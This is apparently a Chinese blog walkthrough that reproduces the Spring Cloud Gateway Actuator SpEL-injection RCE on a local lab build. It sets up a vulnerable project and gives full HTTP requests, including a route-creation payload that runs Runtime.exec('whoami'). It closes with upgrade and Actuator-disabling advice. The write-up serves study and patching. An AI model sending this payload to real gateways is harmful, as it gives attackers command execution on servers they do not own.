Spring Cloud Gateway RCE漏洞的IDEA复现

我们首先了解一些基础知识

spring cloud 微服务架构：

  Spring Cloud微服务架构是一种基于Spring Framework的开源微服务架构解决方案。它将一个大型的单个应用程序和服务拆分为数个甚至数十个支持微服务的小应用，这些小应用可独立地进行开发、管理和迭代。Spring Cloud提供了一系列工具和框架，帮助开发者快速构建和部署微服务应用。其主要特点包括微服务支持、开放性和可扩展性、高可用性和容错性，以及基于云原生架构的部署能力。

  在Spring Cloud微服务架构中，每个服务都围绕具体业务进行构建，并运行在其独立的进程中。服务与服务间采用轻量级的通信机制互相协作，通常是基于HTTP协议的RESTful API3。此外，Spring Cloud还提供了服务注册与发现、配置中心、负载均衡、断路器、网关以及分布式追踪等核心组件和功能，以支持微服务的开发、部署和运维2。

   这种架构模式的主要优势在于降低了系统的耦合性，提供了更加灵活的服务支持，并使得产品交付变得更加简单。同时，Spring Cloud的开源性、可扩展性以及云原生特性也为其在微服务领域的应用提供了广阔的空间。

spring Cloud Gateway （网关服务）概念：

路由：我作为用户访问到网关的时候，会从后面选择一个服务进行访问，根据你的HTTP的协议里面或者服务与服务进行调用的地址里面，根据你的URI进行匹配

断言（可以匹配HTTP请求里面的任意内容 ，不论是get还是post的内容只要匹配上就会给你转发到特定的地址）

过滤器（可以修改HTTP请求内容，当HTTP的某一项内容匹配上，可以去修改请求或者响应HTTP里面的内容）

spring Boot Actuator（监控组件）:

健康检查、审计、统计、HTTP追踪

因为 spring Cloud Gateway 是一个微服务 也可以用spring Boot Actuator去监控它

Actuator操作Gateway接口列表

 一般是：http://host:port/actuator/gateway/ id

接下来开始复现：

首先我们先将pom依赖替换：

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.6.3-SNAPSHOT</version>
		<relativePath/> <!-- lookup parent from repository -->

	</parent>
	<groupId>com.wuya</groupId>
	<artifactId>spring-gateway-rce</artifactId>
	<version>0.0.1</version>
	<name>spring-gateway-rce</name>
	<description>Spring Gateway Env For RCE</description>
	<properties>
		<java.version>1.8</java.version>
		<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>
	</properties>
	<dependencies>
		<dependency>
			<groupId>org.springframework.cloud</groupId>
			<artifactId>spring-cloud-starter-gateway</artifactId>
		</dependency>

<!--		指定gateway server 版本-->
<!--		如果不指定，默认为 3.1.1-SNAPSHOT-->
		<dependency>
			<groupId>org.springframework.cloud</groupId>
			<artifactId>spring-cloud-gateway-server</artifactId>
			<version>3.1.0</version>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>

		<dependency>
		    <groupId>org.springframework.boot</groupId>
		    <artifactId>spring-boot-starter-actuator</artifactId>
		</dependency>
	</dependencies>
	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.springframework.cloud</groupId>
				<artifactId>spring-cloud-dependencies</artifactId>
				<version>${spring-cloud.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
	<repositories>
		<repository>
			<id>spring-milestones</id>
			<name>Spring Milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</repository>
		<repository>
			<id>spring-snapshots</id>
			<name>Spring Snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</repository>
	</repositories>
	<pluginRepositories>
		<pluginRepository>
			<id>spring-milestones</id>
			<name>Spring Milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</pluginRepository>
		<pluginRepository>
			<id>spring-snapshots</id>
			<name>Spring Snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</pluginRepository>
	</pluginRepositories>

</project>

依次写入application.properties、GatewayAppTests.java、GatewayAPP、：

spring.application.name=gateway-demo
server.port=9000
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=gateway

package wuya;

import org.junit.jupiter.api.Test;
import org.springframework.boot.test.context.SpringBootTest;

@SpringBootTest
class GatewayAppTests {

	@Test
	void contextLoads() {
	}

}

package wuya;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.gateway.route.RouteLocator;
import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication
@RestController
public class GatewayApp {

	@RequestMapping("/")
	public String root() {
		return "Gateway Up and Running!";
	}

	@Bean
	RouteLocator testRouteLocator(RouteLocatorBuilder routeLocatorBuilder) {
		return routeLocatorBuilder.routes()
				.route("test", r -> r.path("/test/**").filters(f -> f.rewritePath("/test(?<path>.*)", "/${path}")).uri("https://www.baidu.com"))
				.route("get", r -> r.path("/get/**").filters(f -> f.addRequestHeader("X-Gateway-Test", "Foo")).uri("https://httpbin.org")).build();
	}

	public static void main(String[] args) {
		SpringApplication.run(GatewayApp.class, args);
	}

}

准备工作完成：我们直接启动服务GatewayApp.java

 因为本地测试，我们直接访问我们的本地的9000端口：

启动成功。

接着我们打开BP，找到Repeater:

我们首先要添加路由：

成功

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "6666",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

第二步刷新路由：

成功

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

最后一步，访问过滤器ID：

最终我们执行成功的是我们的攻击语句，这是我们在添加路由中写入：

"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
 

总结：

1.开启Acutator,可以通过接口列出路由（包括过滤器），如： /actuator/gateway/routes

2.可以通过/gateway/routes/{id} 创建路由

3.通过/actuator/gateway/refesh 刷新路由

4.当代有恶意的Filter,里面的spEL表达式会被执行 （访问过滤器ID）以下是一篇介绍spEL的文章

     SpEL表达式 - 简书 (jianshu.com)

扫描和恢复：

版本：

spring Cloud Gateway

spring Cloud Gateway

升级版本 Spring Cloud Gateway

Spring Cloud Gateway>=3.1.1

Spring Cloud Gateway>=3.0.7

在不考虑影响业务的情况下禁用Actuator接口